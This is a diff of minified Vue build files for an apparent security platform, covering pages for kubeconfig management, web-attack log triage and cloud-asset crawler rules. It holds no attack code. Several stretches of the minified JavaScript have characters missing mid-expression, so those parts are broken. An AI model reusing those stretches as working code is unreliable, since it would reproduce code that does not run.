新建集群配置")])],1)],1),a("el-table",{directives:[{name:"loading",rawName:"v-loading",value:e.listLoading,expression:"listLoading"}],staticClass:"headers",staticStyle:{width:"auto","margin-top":"10px"},attrs:{data:e.listDataObject.outSideListData,"element-loading-text":"加载中...",size:"small",border:""}},[a("el-table-column",{attrs:{label:"集群备注",align:"center",width:"220%"},scopedSlots:e._u([{key:"default",fn:function(t){return[a("span",{staticClass:"sbadge"},[e._v(e._s(t.row.kubernetesConfigInfo))])]}}])}),a("el-table-column",{attrs:{label:"创建时间",width:"150%",align:"center"},scopedSlots:e._u([{key:"default",fn:function(t){return[e._v(" "+e._s(t.row.kubernetesConfigCreateTime)+" ")]}}])}),a("el-table-column",{attrs:{label:"更新时间",width:"150%",align:"center"},scopedSlots:e._u([{key:"default",fn:function(t){return[null==t.row.kubernetesConfigUpdateTime?a("span",[e._v("-")]):a("span",[e._v(e._s(t.row.kubernetesConfigUpdateTime))])]}}])}),a("el-table-column",{attrs:{label:"授权状态",align:"center"},scopedSlots:e._u([{key:"default",fn:function(t){return[a("el-switch",{attrs:{value:1==t.row.kubernetesConfigStatus,"active-color":"#13ce66","inactive-color":"#ff4949"},on:{change:function(a){return e.StatusChange(t.row)}}})]}}])}),a("el-table-column",{attrs:{label:"操作",align:"center"},scopedSlots:e._u([{key:"default",fn:function(t){return[a("div",{staticClass:"grid-content bg-purple-light"},[a("el-button",{staticClass:"ml0 mt5",attrs:{size:"mini"},on:{click:function(a){return e.drawerDelete(t.row)}}},[e._v("删除")]),a("el-button",{staticClass:"ml0 mt5",attrs:{size:"mini"},on:{click:function(a){return e.drawerChangeOpera(t.row)}}},[e._v("修改")])],1)]}}])})],1),a("div",{staticClass:"row"},[a("pagination",{directives:[{name:"show",rawName:"v-show",value:e.listQuery.total>10,expression:"listQuery.total > 10"}],staticStyle:{"margin-left":"-20px","margin-top":"-10px"},attrs:{total:e.listQuery.total,page:e.listQuery.page,limit:e.listQuery.limit},on:{"update:page":function(t){return e.$set(e.listQuery,"page",t)},"update:limit":function(t){return e.$set(e.listQuery,"limit",t)},pagination:e.getList}})],1)],1),a("el-drawer",{attrs:{visible:e.drawerCreateStatus,direction:e.direction,size:e.newAlterSize,wrapperClosable:!1,title:"新建集群配置"},on:{"update:visible":function(t){e.drawerCreateStatus=t}}},[a("div",{staticClass:"demo-drawer__content"},[a("el-form",{ref:"createModel",staticStyle:{"margin-left":"5px","margin-right":"20px"},attrs:{model:e.createModel,inline:!1,"label-width":"100px"}},[a("el-form-item",{attrs:{label:"集群别名: "}},[a("el-input",{attrs:{placeholder:"请输入集群别名,好一目了然",size:"small"},model:{value:e.createModel.kubernetesConfigInfo,callback:function(t){e.$set(e.createModel,"kubernetesConfigInfo",t)},expression:"createModel.kubernetesConfigInfo"}})],1),a("el-form-item",{attrs:{label:"集群配置: "}},[a("el-input",{attrs:{type:"textarea",rows:10,placeholder:"请输入Kubconfig"},model:{value:e.createModel.kubernetesConfigKub,callback:function(t){e.$set(e.createModel,"kubernetesConfigKub",t)},expression:"createModel.kubernetesConfigKub"}})],1)],1),a("div",{staticClass:"demo-drawer__footer"},[a("el-button",{attrs:{size:"small"},on:{click:e.drawerCreateOpera}},[e._v(" 返回")]),a("el-button",{attrs:{type:"primary",size:"small"},on:{click:e.drawerCreate}},[e._v(" 新建集群配置")])],1)],1)]),a("el-drawer",{attrs:{visible:e.drawerChangeStatus,direction:e.direction,size:e.newAlterSize,wrapperClosable:!1,title:"修改集群配置"},on:{"update:visible":function(t){e.drawerChangeStatus=t}}},[a("div",{staticClass:"demo-drawer__content"},[a("el-form",{ref:"createModel",staticStyle:{"margin-left":"5px","margin-right":"20px"},attrs:{model:e.changeModel,inline:!1,"label-width":"100px"}},[a("el-form-item",{attrs:{label:"集群别名: "}},[a("el-input",{attrs:{placeholder:"请输入集群别名,好一目了然",size:"small"},model:{value:e.changeModel.kubernetesConfigInfo,callback:function(t){e.$set(e.changeModel,"kubernetesConfigInfo",t)},expression:"changeModel.kubernetesConfigInfo"}})],1),a("el-form-item",{attrs:{label:"集群配置: "}},[a("el-input",{attrs:{type:"textarea",rows:10,placeholder:"请输入Kubconfig"},model:{value:e.changeModel.kubernetesConfigKub,callback:function(t){e.$set(e.changeModel,"kubernetesConfigKub",t)},expression:"changeModel.kubernetesConfigKub"}})],1)],1),a("div",{staticClass:"demo-drawer__footer"},[a("el-button",{attrs:{size:"small"},on:{click:e.drawerChangeOpera}},[e._v(" 返回")]),a("el-button",{attrs:{type:"primary",size:"small"},on:{click:e.drawerChange}},[e._v(" 修改集群配置")])],1)],1)])],1)},r=[],i=a("333d"),s=a("b775"),o=a("4328"),l=a.n(o);function u(e){return s["a"].post("/kubernetes/lists",l.a.stringify(e))}function c(e){return s["a"].post("/kubernetes/add",l.a.stringify(e))}function d(e){return s["a"].post("/kubernetes/changeStatus",l.a.stringify(e))}function f(e){return s["a"].post("/kubernetes/delete",l.a.stringify(e))}function g(e){return s["a"].post("/kubernetes/change",l.a.stringify(e))}var p={name:"",components:{Pagination:i["a"]},props:{},data:function(){return{selectOptions:[{label:"阿里云",value:0},{label:"腾讯云",value:1}],drawerCreateStatus:!1,drawerChangeStatus:!1,listLoading:!1,newAlterSize:"40%",listQuery:{page:1,limit:10,total:0},listDataObject:{outSideListData:[]},createModel:{},changeModel:{},direction:"rtl"}},computed:{},watch:{},created:function(){},mounted:function(){this.getList(),this.checkDv()},methods:{drawerCreateOpera:function(){this.drawerCreateStatus?this.drawerCreateStatus=!1:this.drawerCreateStatus=!0},drawerChangeOpera:function(e){this.changeModel=e,this.drawerChangeStatus?this.drawerChangeStatus=!1:this.drawerChangeStatus=!0},StatusChange:function(e){var t=this;this.$confirm("是否确定切换集群配置状态?","确认信息",{distinguishCancelAndClose:!0,confirmButtonText:"确定切换",cancelButtonText:"返回"}).then((function(){d({Id:e.Id}).then((function(e){1===e.status?(t.$message.success(e.msg),t.getList()):t.$message.error(e.msg)}))})).catch((function(e){}))},drawerCreate:function(){var e=this;c(this.createModel).then((function(t){1===t.status?(e.$message.success(t.msg),e.getList(),e.drawerCreateOpera()):e.$message.error("集群配置创建失败,配置无效!")}))},drawerChange:function(){var e=this;g(this.changeModel).then((function(t){1===t.status?(e.$message.success(t.msg),e.getList(),e.drawerCreateOpera()):e.$message.error(t.msg)}))},drawerDelete:function(e){var t=this;this.$confirm("确定要删除授权吗?","提示",{confirmButtonText:"确定",cancelButtonText:"取消",type:"warning"}).then((function(){f({Id:e.Id}).then((function(e){1===e.status&&(t.$message.success(e.msg),t.getList())}))})).catch((function(){}))},checkDv:function(){var e=document.body.clientWidth;e>1619&&(this.newAlterSize="30%")},getList:function(){var e=this;this.listLoading=!0;var t={page:this.listQuery.page,pageSize:this.listQuery.limit};u(t).then((function(t){e.listLoading=!1,1===t.status?(e.listDataObject.outSideListData=t.data.list,e.listQuery.page=t.data.page,e.listQuery.limit=t.data.pageSize,e.listQuery.total=t.data.total):e.$message.error(t.msg)}))}}},m=p,h=(a("07fb"),a("2e93"),a("2877")),b=Object(h["a"])(m,n,r,!1,null,"0fc1bbd0",null);t["default"]=b.exports},f1df:function(e,t,a){"use strict";a("8312")},fd17:function(e,t,a){}}]); \ No newline at end of file diff --git a/frontend/dist/static/js/chunk-5ddacc57.54b0480b.js b/frontend/dist/static/js/chunk-5ddacc57.54b0480b.js new file mode 100644 index 0000000..2723e0e --- /dev/null +++ b/frontend/dist/static/js/chunk-5ddacc57.54b0480b.js @@ -0,0 +1 @@ +(window["webpackJsonp"]=window["webpackJsonp"]||[]).push([["chunk-5ddacc57"],{"272d":function(t,e,a){"use strict";a("d8a6")},"333d":function(t,e,a){"use strict";var r=function(){var t=this,e=t.$createElement,a=t._self._c||e;return a("div",{staticClass:"pagination-container",class:{hidden:t.hidden}},[a("el-pagination",t._b({attrs:{background:t.background,"current-page":t.currentPage,"page-size":t.pageSize,layout:t.layout,"page-sizes":t.pageSizes,total:t.total},on:{"update:currentPage":function(e){t.currentPage=e},"update:current-page":function(e){t.currentPage=e},"update:pageSize":function(e){t.pageSize=e},"update:page-size":function(e){t.pageSize=e},"size-change":t.handleSizeChange,"current-change":t.handleCurrentChange}},"el-pagination",t.$attrs,!1))],1)},i=[];a("a9e3");Math.easeInOutQuad=function(t,e,a,r){return t/=r/2,t<1?a/2*t*t+e:(t--,-a/2*(t*(t-2)-1)+e)};var n=function(){return window.requestAnimationFrame||window.webkitRequestAnimationFrame||window.mozRequestAnimationFrame||function(t){window.setTimeout(t,1e3/60)}}();function s(t){document.documentElement.scrollTop=t,document.body.parentNode.scrollTop=t,document.body.scrollTop=t}function o(){return document.documentElement.scrollTop||document.body.parentNode.scrollTop||document.body.scrollTop}function c(t,e,a){var r=o(),i=t-r,c=20,l=0;e="undefined"===typeof e?500:e;var u=function t(){l+=c;var o=Math.easeInOutQuad(l,r,i,e);s(o),l2)if(l=f(l),e=l.charCodeAt(0),43===e||45===e){if(a=l.charCodeAt(2),88===a||120===a)return NaN}else if(48===e){switch(l.charCodeAt(1)){case 66:case 98:r=2,i=49;break;case 79:case 111:r=8,i=55;break;default:return+l}for(n=l.slice(2),s=n.length,o=0;oi)return NaN;return parseInt(n,r)}return+l};if(n(v,!k(" 0o1")||!k("0b1")||k("+0x1"))){for(var y,w=function(t){var e=arguments.length<1?0:t,a=this;return a instanceof w&&(_?d((function(){b.valueOf.call(a)})):c(a)!=v)?l(new k(S(e)),a,w):S(e)},T=r?m(k):"MAX_VALUE,MIN_VALUE,NaN,NEGATIVE_INFINITY,POSITIVE_INFINITY,EPSILON,isFinite,isInteger,isNaN,isSafeInteger,MAX_SAFE_INTEGER,MIN_SAFE_INTEGER,parseFloat,parseInt,isInteger".split(","),C=0;T.length>C;C++)o(k,y=T[C])&&!o(w,y)&&h(w,y,g(k,y));w.prototype=b,b.constructor=w,s(i,v,w)}},b775:function(t,e,a){"use strict";a("d3b7");var r=a("bc3a"),i=a.n(r),n=a("5c96"),s=i.a.create({baseURL:"/prod-api",timeout:5e3});s.interceptors.request.use((function(t){return t.headers["token"]=localStorage.getItem("token"),t.headers["website"]=localStorage.getItem("websiteDomain"),t.headers["roles"]=localStorage.getItem("roles"),t}),(function(t){return Promise.reject(t)})),s.interceptors.response.use((function(t){var e=t.data;return e}),(function(t){return Object(n["Notification"])({message:t.message,title:"错误",type:"error"}),Promise.reject(t)})),e["a"]=s},b909:function(t,e,a){"use strict";a("9bbf")},d299:function(t,e,a){"use strict";a.r(e);var r=function(){var t=this,e=t.$createElement,a=t._self._c||e;return a("div",{staticClass:"dashboard-container"},[a("el-form",{staticStyle:{"margin-top":"-15px"},attrs:{inline:!0,size:"mini",model:t.searchService,"hide-required-asterisk":""}},[a("el-form-item",{attrs:{prop:"orderId"}},[a("el-input",{attrs:{size:"small",type:"orderId",placeholder:"请输入攻击源IP"},model:{value:t.searchService.interviewer,callback:function(e){t.$set(t.searchService,"interviewer",e)},expression:"searchService.interviewer"}})],1),a("el-form-item",[a("el-select",{attrs:{size:"small",placeholder:"请选择"},model:{value:t.searchService.requestType,callback:function(e){t.$set(t.searchService,"requestType",e)},expression:"searchService.requestType"}},[a("el-option",{attrs:{label:"GET",value:"0"}}),a("el-option",{attrs:{label:"POST",value:"1"}}),a("el-option",{attrs:{label:"PUT",value:"2"}}),a("el-option",{attrs:{label:"DELETE",value:"3"}}),a("el-option",{attrs:{label:"HEAD",value:"4"}}),a("el-option",{attrs:{label:"OPTIONS",value:"5"}}),a("el-option",{attrs:{label:"TRACE",value:"6"}}),a("el-option",{attrs:{label:"CONNECT",value:"7"}}),a("el-option",{attrs:{label:"PATCH",value:"8"}})],1)],1),a("el-form-item",[a("div",{staticClass:"block picker"},[a("el-form-item",[a("el-date-picker",{attrs:{type:"daterange",align:"right","unlink-panels":"","range-separator":"至","start-placeholder":"开始日期","end-placeholder":"结束日期","value-format":"yyyy-MM-dd",clearable:!1,size:"small"},model:{value:t.searchService.dateTime,callback:function(e){t.$set(t.searchService,"dateTime",e)},expression:"searchService.dateTime"}})],1)],1)]),a("el-form-item",[a("el-button",{attrs:{type:"primary",size:"small",icon:"el-icon-search"},on:{click:function(e){return t.searchServiceBtn()}}},[t._v("检索")]),a("el-button",{attrs:{type:"primary",size:"small",icon:"el-icon-s-promotion"},on:{click:function(e){return t.appearBtn()}}},[t._v(" 确认攻击")]),a("el-button",{attrs:{type:"primary",size:"small",icon:"el-icon-delete-solid"},on:{click:function(e){return t.loseBtn()}}},[t._v(" 误报忽略")])],1)],1),a("el-table",{directives:[{name:"loading",rawName:"v-loading",value:t.listLoading,expression:"listLoading"}],key:t.searchService.region,staticClass:"headers",staticStyle:{"margin-top":"-18px"},attrs:{size:"small",data:t.behaviourLists,"element-loading-text":"加载中...",border:""},on:{"selection-change":t.selectionChange,"sort-change":t.handleSort}},[a("el-table-column",{attrs:{type:"selection",align:"center"}}),a("el-table-column",{attrs:{label:"攻击时间",align:"center",sortable:"custom",prop:"attackCreatetime",width:"200%"},scopedSlots:t._u([{key:"default",fn:function(e){return[a("span",[t._v(t._s(e.row.attackCreatetime))])]}}])}),a("el-table-column",{attrs:{label:"请求类型",align:"center",width:"160%",formatter:t.stateFormat}}),a("el-table-column",{attrs:{label:"攻击源IP",align:"center"},scopedSlots:t._u([{key:"default",fn:function(e){return[a("span",[t._v(t._s(e.row.attackSourceIp))])]}}])}),a("el-table-column",{attrs:{label:"响应头",align:"center"},scopedSlots:t._u([{key:"default",fn:function(e){return[a("span",[t._v(t._s(e.row.attackHttpCode))])]}}])}),a("el-table-column",{attrs:{label:"风险等级",align:"center"},scopedSlots:t._u([{key:"default",fn:function(e){return[0==e.row.attackRiskLevel?a("span",[a("el-tag",{attrs:{type:"success",size:"mini"}},[t._v("低危")])],1):t._e(),1==e.row.attackRiskLevel?a("span",[a("el-tag",{attrs:{type:"warning",size:"mini"}},[t._v("中危")])],1):t._e(),2==e.row.attackRiskLevel?a("span",[a("el-tag",{attrs:{type:"danger",size:"mini"}},[t._v("高危")])],1):t._e()]}}])}),a("el-table-column",{attrs:{label:"攻击类型",align:"center"},scopedSlots:t._u([{key:"default",fn:function(e){return[a("span",[t._v(t._s(e.row.rulesName))])]}}])}),a("el-table-column",{attrs:{label:"处置",align:"center"},scopedSlots:t._u([{key:"default",fn:function(e){return[0==e.row.attackEffective?a("span",[t._v("待处置")]):t._e(),1==e.row.attackEffective?a("span",[t._v("确认攻击")]):t._e(),2==e.row.attackEffective?a("span",[t._v("确认误报")]):t._e()]}}])}),a("el-table-column",{attrs:{label:"操作",width:"175px",align:"center"},scopedSlots:t._u([{key:"default",fn:function(e){return[a("div",{staticClass:"grid-content bg-purple-light"},[a("el-button",{staticClass:"ml0 mt5",attrs:{size:"mini"},on:{click:function(a){return t.lookBtn(e.row)}}},[t._v("查看")])],1)]}}])})],1),a("div",{staticClass:"row"},[a("pagination",{directives:[{name:"show",rawName:"v-show",value:t.total>0,expression:"total > 0"}],staticStyle:{"margin-left":"-20px","margin-top":"-10px"},attrs:{total:t.total,page:t.listQuery.page,limit:t.listQuery.limit},on:{"update:page":function(e){return t.$set(t.listQuery,"page",e)},"update:limit":function(e){return t.$set(t.listQuery,"limit",e)},pagination:t.getbehaviourList}})],1),a("el-drawer",{attrs:{visible:t.messagePop,direction:t.direction,size:"30%",title:"查看信息"},on:{"update:visible":function(e){t.messagePop=e}}},[a("div",{staticClass:"demo-drawer__content"},[a("el-form",{ref:"form"},[a("el-breadcrumb",{staticStyle:{"margin-left":"20px","margin-bottom":"-10px"},attrs:{"separator-class":"el-icon-arrow-right"}},[a("el-breadcrumb-item",{attrs:{to:{path:"/"}}},[t._v("基础信息")]),a("el-breadcrumb-item",[t._v("请求信息")])],1),a("el-descriptions",{staticStyle:{margin:"40px"}},[a("el-descriptions-item",{attrs:{label:"攻击时间"}},[t._v(t._s(t.attackCreateTime_look))]),a("el-descriptions-item",{attrs:{label:"请求类型"}},[t._v(t._s(t.attackMethod))]),a("el-descriptions-item",{attrs:{label:"来源IP"}},[t._v(t._s(t.attackSourceIp))]),a("el-descriptions-item",{attrs:{label:"风险等级"}},[t._v(t._s(t.attackRiskLevel))]),a("el-descriptions-item",{attrs:{label:"目标业务"}},[t._v(t._s(t.attackHosts))]),a("el-descriptions-item",{attrs:{label:"攻击类型"}},[t._v(t._s(t.attackRulesId))]),a("el-descriptions-item",{attrs:{label:"响应头"}},[t._v(t._s(t.attackHttpCode))]),a("el-descriptions-item",{staticStyle:{width:"20px"},attrs:{label:"攻击路径"}},[t._v(t._s(t.attackPath))])],1),a("el-breadcrumb",{staticStyle:{"margin-top":"-28px","margin-left":"20px","margin-bottom":"30px"},attrs:{"separator-class":"el-icon-arrow-right"}},[a("el-breadcrumb-item",{attrs:{to:{path:"/"}}},[t._v("处置信息")]),a("el-breadcrumb-item",[t._v("流转清单")])],1),a("div",{staticClass:"block",staticStyle:{"margin-left":"-10px","margin-right":"25px"}},[a("el-timeline",t._l(t.attackTimeLineData,(function(e,r){return a("el-timeline-item",{key:r,attrs:{timestamp:e.attackCirculationCreateTime,placement:"top"}},[a("el-card",[a("h4",[t._v(t._s(e.attackCirculationLogs))]),a("p",[t._v("处置于: "+t._s(e.attackCirculationCreateTime))])])],1)})),1)],1)],1),a("div",{staticClass:"demo-drawer__footer"},[a("el-button",{attrs:{size:"small"},on:{click:function(e){return t.returnBtn()}}},[t._v(" 返回")])],1)],1)]),a("el-dialog",{attrs:{title:"提示",visible:t.ignorePop,width:"25%",top:"30vh"},on:{"update:visible":function(e){t.ignorePop=e}}},[a("span",[t._v("请问确定忽略这些风险吗?")]),a("span",{staticClass:"dialog-footer",attrs:{slot:"footer"},slot:"footer"},[a("el-button",{on:{click:function(e){t.ignorePop=!1}}},[t._v("返回")]),a("el-button",{attrs:{type:"primary"},on:{click:function(e){return t.ignoreYes()}}},[t._v("确认")])],1)]),a("el-drawer",{attrs:{visible:t.appearPop,direction:t.direction,size:"25%",title:"确认攻击"},on:{"update:visible":function(e){t.appearPop=e}}},[a("div",{staticClass:"demo-drawer__content"},[a("el-form",{ref:"form",attrs:{model:t.reportAll,"label-width":"20%"}},[a("el-form-item",{attrs:{label:"初步结论:"}},[a("el-col",{attrs:{span:16}},[a("el-input",{attrs:{size:"small",type:"textarea",placeholder:"请输入初步结论"},model:{value:t.reportAll.preview,callback:function(e){t.$set(t.reportAll,"preview",e)},expression:"reportAll.preview"}})],1)],1)],1),a("div",{staticClass:"demo-drawer__footer"},[a("el-button",{on:{click:function(e){return t.returnBtn()}}},[t._v("取 消")]),a("el-button",{attrs:{type:"primary"},on:{click:function(e){return t.reportTo()}}},[t._v("确认攻击")])],1)],1)])],1)},i=[],n=(a("d3b7"),a("25f0"),a("d81d"),a("ac1f"),a("5319"),a("333d")),s=a("b775"),o=a("4328"),c=a.n(o);function l(t){return s["a"].post("/webattack/lists",c.a.stringify(t))}function u(t){return s["a"].post("/webattack/read",c.a.stringify(t))}function d(t){return s["a"].post("/webattack/operate",c.a.stringify(t))}function p(t){return s["a"].post("/webattack/attackTimeLine",c.a.stringify(t))}var m={name:"",components:{Pagination:n["a"]},props:{},data:function(){return{attackCreateTime_look:"",attackMethod:"",attackSourceIp:"",attackRiskLevel:"",attackHttpCode:"",attackPath:"",attackRulesId:"",attackHosts:"",reportAll:{preview:"",grade:"0"},order_desc:"desc",attackCreatetime:"attackCreatetime",messagePop:!1,ignorePop:!1,appearPop:!1,direction:"rtl",listLoading:!1,orderServiceBasePageInfo:{currentPage:1,pageSize:10,total:0},searchService:{interviewer:"",requestType:"",Domain:"",dateTime:["",""],StartTime:"",EndTime:""},agency:{value:"",options:[]},behaviourLists:[],behaviourPage:{currentPage:1,pageSize:10,total:0},total:0,listQuery:{importance:void 0,title:void 0,type:void 0,page:1,limit:10},attackTimeLineData:[]}},computed:{},watch:{},created:function(){},mounted:function(){this.getbehaviourList()},methods:{stateFormat:function(t,e){switch(parseInt(t.attackMethod)){case 0:return"GET";case 1:return"POST";case 2:return"PUT";case 0:return"DELETE";case 1:return"HEAD";case 2:return"OPTIONS";case 0:return"TRACE";case 1:return"CONNECT";case 2:return"PATCH"}},handleChange:function(t){this.behaviourPage.currentPage=1,this.getbehaviourList()},EmerBroad:function(){},reportTo:function(){var t=this;d({Ids:this.ids.toString(),FollowLog:this.reportAll.preview,Level:this.reportAll.grade,operate:1}).then((function(e){1===e.status?(t.$message.success(e.msg),t.getbehaviourList(),t.appearPop=!1):(t.$message.error(e.msg),t.appearPop=!1)}))},loseBtn:function(){this.ids?this.ignorePop=!0:this.$message.error("请勾选疑似攻击行为日志")},appearBtn:function(){this.ids?this.appearPop=!0:this.$message.error("请勾选疑似攻击行为日志")},ignoreYes:function(){var t=this;d({Ids:this.ids.toString(),operate:2}).then((function(e){1===e.status?(t.$message.success(e.msg),t.getbehaviourList(),t.ignorePop=!1):(t.$message.error(e.msg),t.ignorePop=!1)}))},ignoreBtn:function(){this.ignorePop=!0},selectionChange:function(t){this.ids=t.map((function(t){return t.attackId}))},returnBtn:function(){this.messagePop=!1},lookBtn:function(t){var e=this;p({Id:t.attackId}).then((function(t){1===t.status?e.attackTimeLineData=t.data:e.$message.error(t.msg)})),u({Id:t.attackId}).then((function(t){1===t.status?(e.messagePop=!0,e.attackCreateTime_look=t.data.attackCreatetime,0==t.data.attackMethod?e.attackMethod="GET":1==t.data.attackMethod?e.attackMethod="POST":2==t.data.attackMethod?e.attackMethod="PUT":3==t.data.attackMethod?e.attackMethod="DELETE":4==t.data.attackMethod?e.attackMethod="HEAD":5==t.data.attackMethod?e.attackMethod="OPTIONS":6==t.data.attackMethod?e.attackMethod="TRACE":7==t.data.attackMethod?e.attackMethod="CONNECT":8==t.data.attackMethod&&(e.attackMethod="PATCH"),e.attackSourceIp=t.data.attackSourceIp,0==t.data.attackRiskLevel?e.attackRiskLevel="低危":1==t.data.attackRiskLevel?e.attackRiskLevel="中危":2==t.data.attackRiskLevel?e.attackRiskLevel="高危":3==t.data.attackRiskLevel&&(e.attackRiskLevel="严重"),e.attackHttpCode=t.data.attackHttpCode,e.attackRulesId=t.data.attackRulesId,e.attackHosts=t.data.attackHosts,e.attackPath=t.data.attackPath):(e.messagePop=!1,e.$message.error(t.msg))}))},handleSort:function(t){"ascending"==t.order?(this.attackCreatetime="attackCreatetime",this.order_desc="desc"):"descending"==t.order&&(this.attackCreatetime="attackCreatetime",this.order_desc="asc"),this.getbehaviourList()},getbehaviourList:function(){var t=this;this.listLoading=!0;var e={page:this.listQuery.page,pageSize:this.listQuery.limit,Sort:this.attackCreatetime,Order:this.order_desc};""!=this.searchService.interviewer&&(e["Ip"]=this.searchService.interviewer),""!=this.searchService.requestType&&(e["Method"]=this.searchService.requestType),""!=this.searchService.Domain.replace(/\s+/g,"")&&(e["Domain"]=this.searchService.Domain),""!=this.searchService.dateTime[0]&&(e["StartTime"]=this.searchService.dateTime[0],e["EndTime"]=this.searchService.dateTime[1]),l(e).then((function(e){t.listLoading=!1,1===e.status?(t.behaviourLists=e.data.list,t.listQuery.page=e.data.page,t.listQuery.limit=e.data.pageSize,t.total=e.data.total):t.$message.error(e.msg)}))},searchServiceBtn:function(){this.listQuery.page=1,this.getbehaviourList()}}},g=m,h=(a("272d"),a("834c"),a("b909"),a("2877")),f=Object(h["a"])(g,r,i,!1,null,"7ac478de",null);e["default"]=f.exports},d8a6:function(t,e,a){},f1df:function(t,e,a){"use strict";a("8312")}}]); \ No newline at end of file diff --git a/frontend/dist/static/js/chunk-64a7f1ba.59a9b857.js b/frontend/dist/static/js/chunk-64a7f1ba.59a9b857.js new file mode 100644 index 0000000..121ad01 --- /dev/null +++ b/frontend/dist/static/js/chunk-64a7f1ba.59a9b857.js @@ -0,0 +1 @@ +(window["webpackJsonp"]=window["webpackJsonp"]||[]).push([["chunk-64a7f1ba"],{"2a38":function(e,t,a){"use strict";a("45e4")},"333d":function(e,t,a){"use strict";var n=function(){var e=this,t=e.$createElement,a=e._self._c||t;return a("div",{staticClass:"pagination-container",class:{hidden:e.hidden}},[a("el-pagination",e._b({attrs:{background:e.background,"current-page":e.currentPage,"page-size":e.pageSize,layout:e.layout,"page-sizes":e.pageSizes,total:e.total},on:{"update:currentPage":function(t){e.currentPage=t},"update:current-page":function(t){e.currentPage=t},"update:pageSize":function(t){e.pageSize=t},"update:page-size":function(t){e.pageSize=t},"size-change":e.handleSizeChange,"current-change":e.handleCurrentChange}},"el-pagination",e.$attrs,!1))],1)},r=[];a("a9e3");Math.easeInOutQuad=function(e,t,a,n){return e/=n/2,e<1?a/2*e*e+t:(e--,-a/2*(e*(e-2)-1)+t)};var i=function(){return window.requestAnimationFrame||window.webkitRequestAnimationFrame||window.mozRequestAnimationFrame||function(e){window.setTimeout(e,1e3/60)}}();function s(e){document.documentElement.scrollTop=e,document.body.parentNode.scrollTop=e,document.body.scrollTop=e}function o(){return document.documentElement.scrollTop||document.body.parentNode.scrollTop||document.body.scrollTop}function l(e,t,a){var n=o(),r=e-n,l=20,u=0;t="undefined"===typeof t?500:t;var c=function e(){u+=l;var o=Math.easeInOutQuad(u,n,r,t);s(o),u10,expression:"listQuery.total > 10"}],staticStyle:{"margin-left":"-20px","margin-top":"-10px"},attrs:{total:e.listQuery.total,page:e.listQuery.page,limit:e.listQuery.limit},on:{"update:page":function(t){return e.$set(e.listQuery,"page",t)},"update:limit":function(t){return e.$set(e.listQuery,"limit",t)},pagination:e.getList}})],1)],1),a("el-drawer",{attrs:{visible:e.drawerCreateStatus,direction:e.direction,size:e.newAlterSize,wrapperClosable:!1,title:"新建爬取规则"},on:{"update:visible":function(t){e.drawerCreateStatus=t}}},[a("div",{staticClass:"demo-drawer__content"},[a("div",{staticClass:"tip",staticStyle:{margin:"20px","margin-top":"-1px","font-size":"14px",color:"#5e6d82","line-height":"1.5em"}},[e._v(" 爬取规则创建之后,底层资产采集工具记得启动,不然无法抓取资产,中间SDK已经集成好了的,直接拿来就能用。 其次,抓取前记得把对应抓取的配置给配置好,比如云厂商配置、K8S配置一类的,在平台上托管好。 平台支持一个特点是,如果在平台上托管了云厂商秘钥,而容器集群在云上,则自动去采集容器集群的配置,无需手动处理。 ")]),a("el-form",{ref:"createModel",staticStyle:{"margin-left":"5px","margin-right":"20px"},attrs:{model:e.createModel,inline:!1,"label-width":"100px"}},[a("el-form-item",{attrs:{label:"爬取类型: "}},[a("el-select",{attrs:{size:"small",placeholder:"请选择爬取类型"},on:{change:e.spiderTypeChange},model:{value:e.createModel.spiderConfig,callback:function(t){e.$set(e.createModel,"spiderConfig",t)},expression:"createModel.spiderConfig"}},e._l(e.selectOptions.spiderConfig,(function(e){return a("el-option",{key:e.value,attrs:{label:e.label,value:e.value}})})),1)],1),a("el-form-item",{attrs:{label:"爬取周期: "}},[a("el-select",{attrs:{size:"small",placeholder:"请选择爬取周期"},model:{value:e.createModel.spiderCrontabType,callback:function(t){e.$set(e.createModel,"spiderCrontabType",t)},expression:"createModel.spiderCrontabType"}},e._l(e.selectOptions.spiderCrontab,(function(e){return a("el-option",{key:e.value,attrs:{label:e.label,value:e.value}})})),1)],1),a("el-form-item",{attrs:{label:"爬取对象选择: "}},[a("el-select",{attrs:{size:"small",placeholder:"请选择爬取对象"},model:{value:e.createModel.spiderId,callback:function(t){e.$set(e.createModel,"spiderId",t)},expression:"createModel.spiderId"}},e._l(e.selectOptions.secretAssets,(function(e){return a("el-option",{key:e.value,attrs:{label:e.label,value:e.value}})})),1)],1)],1),a("div",{staticClass:"demo-drawer__footer"},[a("el-button",{attrs:{size:"small"},on:{click:e.drawerCreateOpera}},[e._v(" 返回")]),a("el-button",{attrs:{type:"primary",size:"small"},on:{click:e.drawerCreate}},[e._v(" 新建爬取策略")])],1)],1)])],1)},r=[],i=a("333d"),s=a("c2f1"),o={name:"",components:{Pagination:i["a"]},props:{},data:function(){return{drawerCreateStatus:!1,drawerChangeStatus:!1,listLoading:!1,newAlterSize:"40%",listQuery:{page:1,limit:10,total:0},listDataObject:{outSideListData:[]},createModel:{},changeModel:{},direction:"rtl",selectOptions:{spiderConfig:[{label:"云上资产",value:0},{label:"K8S资产(未开放)",value:1},{label:"Git资产(未开放)",value:2}],spiderCrontab:[{label:"每分钟",value:0},{label:"每小时",value:1},{label:"每天(零点)",value:2}],secretAssets:[]}}},computed:{},watch:{},created:function(){},mounted:function(){this.getList(),this.checkDv()},methods:{spiderTypeChange:function(){var e=this;0==this.createModel.spiderConfig&&Object(s["g"])({SpiderType:0}).then((function(t){1==t.status&&(e.selectOptions.secretAssets=t.data)}))},drawerCreateOpera:function(){this.drawerCreateStatus?this.drawerCreateStatus=!1:this.drawerCreateStatus=!0},drawerChangeOpera:function(e){this.changeModel=e,this.drawerChangeStatus?this.drawerChangeStatus=!1:this.drawerChangeStatus=!0},StatusChange:function(e){var t=this;this.$confirm("是否确定切换爬取配置状态?","确认信息",{distinguishCancelAndClose:!0,confirmButtonText:"确定切换",cancelButtonText:"返回"}).then((function(){Object(s["d"])({Id:e.spiderIds}).then((function(e){1===e.status?(t.$message.success(e.msg),t.getList()):t.$message.error(e.msg)}))})).catch((function(e){}))},drawerCreate:function(){var e=this;Object(s["c"])(this.createModel).then((function(t){1===t.status?(e.$message.success(t.msg),e.getList(),e.drawerCreateOpera()):e.$message.error("集群配置创建失败,配置无效!")}))},drawerDelete:function(e){var t=this;this.$confirm("确定要删除爬取规则吗?","提示",{confirmButtonText:"确定",cancelButtonText:"取消",type:"warning"}).then((function(){Object(s["e"])({Id:e.spiderIds}).then((function(e){1===e.status&&(t.$message.success(e.msg),t.getList())}))})).catch((function(){}))},checkDv:function(){var e=document.body.clientWidth;e>1619&&(this.newAlterSize="17%")},getList:function(){var e=this;this.listLoading=!0;var 